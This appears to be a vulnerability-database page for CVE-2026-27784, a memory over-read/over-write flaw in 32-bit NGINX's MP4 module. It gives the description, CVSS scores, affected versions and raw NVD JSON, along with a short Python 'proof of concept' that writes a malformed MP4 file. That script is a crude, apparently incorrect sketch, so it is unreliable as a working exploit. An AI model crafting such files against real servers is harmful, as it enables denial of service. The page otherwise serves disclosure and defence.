CVE-2026-27784

Description

The 32-bit implementation of NGINX Open Source has a vulnerability in the ngx_http_mp4_module module, which might allow an attacker to over-read or over-write NGINX worker memory resulting in its termination, using a specially crafted MP4 file. The issue only affects 32-bit NGINX Open Source if it is built with the ngx_http_mp4_module module and the mp4 directive is used in the configuration file. Additionally, the attack is possible only if an attacker can trigger the processing of a specially crafted MP4 file with the ngx_http_mp4_module module. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:f5:nginx_open_source:*:*:*:*:*:*:*:* - VULNERABLE

NGINX Open Source 32-bit versions (with ngx_http_mp4_module enabled)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept (PoC) for CVE-2026-27784
# This script generates a malformed MP4 file designed to trigger the
# memory over-read/write vulnerability in 32-bit NGINX.

import struct

def create_malformed_mp4(filename):
    # Start with a basic MP4 header
    # This is a simplified structure to demonstrate the concept
    data = b''
    
    # ftyp box (standard)
    data += b'\x00\x00\x00\x20'  # Size (32 bytes)
    data += b'ftyp'
    data += b'isom'
    data += b'\x00\x00\x02\x00'
    data += b'isom'
    data += b'avc1'
    
    # Malformed moov atom to trigger the 32-bit overflow
    # Setting a very large size or corrupted offset for specific atoms
    # may cause the ngx_http_mp4_module to miscalculate pointers.
    malformed_atom_size = 0xFFFFFFFF  # Max 32-bit value
    
    # Constructing a malformed 'stsz' (Sample Size) atom
    # Vulnerability often lies in parsing sample tables
    data += struct.pack('>I', malformed_atom_size)
    data += b'stsz'
    data += b'\x00\x00\x00\x00'  # Version/Flags
    data += b'\x00\x00\x00\x01'  # Sample size (0 = variable)
    data += b'\x00\x00\x00\x01'  # Sample count
    
    # Add padding to ensure file is processed
    data += b'A' * 1024
    
    with open(filename, 'wb') as f:
        f.write(data)
    print(f"Malformed MP4 file created: {filename}")

if __name__ == "__main__":
    create_malformed_mp4("exploit_cve_2026_27784.mp4")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27784
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27784
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27784/
[4] VulDB https://vuldb.com/cve/CVE-2026-27784
[5] https://my.f5.com/manage/s/article/K000160364

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27784", "sourceIdentifier": "[email protected]", "published": "2026-03-24T15:16:33.350", "lastModified": "2026-03-30T13:59:42.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The 32-bit implementation of NGINX Open Source has a vulnerability in the ngx_http_mp4_module module, which might allow an attacker to over-read or over-write NGINX worker memory resulting in its termination, using a specially crafted MP4 file. The issue only affects 32-bit NGINX Open Source if it is built with the ngx_http_mp4_module module and the mp4 directive is used in the configuration file. Additionally, the attack is possible only if an attacker can trigger the processing of a specially crafted MP4 file with the ngx_http_mp4_module module. \n\n\nNote: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}, {"lang": "es", "value": "La implementación de 32 bits de NGINX Open Source tiene una vulnerabilidad en el módulo ngx_http_mp4_module, lo que podría permitir a un atacante leer en exceso o sobrescribir la memoria del proceso worker de NGINX, lo que resultaría en su terminación, utilizando un archivo MP4 especialmente diseñado. El problema solo afecta a NGINX Open Source de 32 bits si está compilado con el módulo ngx_http_mp4_module y la directiva mp4 se utiliza en el archivo de configuración. Además, el ataque es posible solo si un atacante puede desencadenar el procesamiento de un archivo MP4 especialmente diseñado con el módulo ngx_http_mp4_module.\n\nNota: Las versiones de software que han alcanzado el Fin de Soporte Técnico (EoTS) no se evalúan."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_open_source:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.1.19", "versionEndExcluding": "1.28.3", "matchCriteriaId": "510D19AC-5184-437F-B196-1454B33B6E49"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:nginx_open_source:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.29.0", "versionEndExcluding": "1.29.7", "matchCriteriaId": "C0EFE28B-E8E5-464E-B407-96436CA87C8E"}]}]}], "references": [{"url": "https://my.f5.com/manage/s/article/K000160364", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}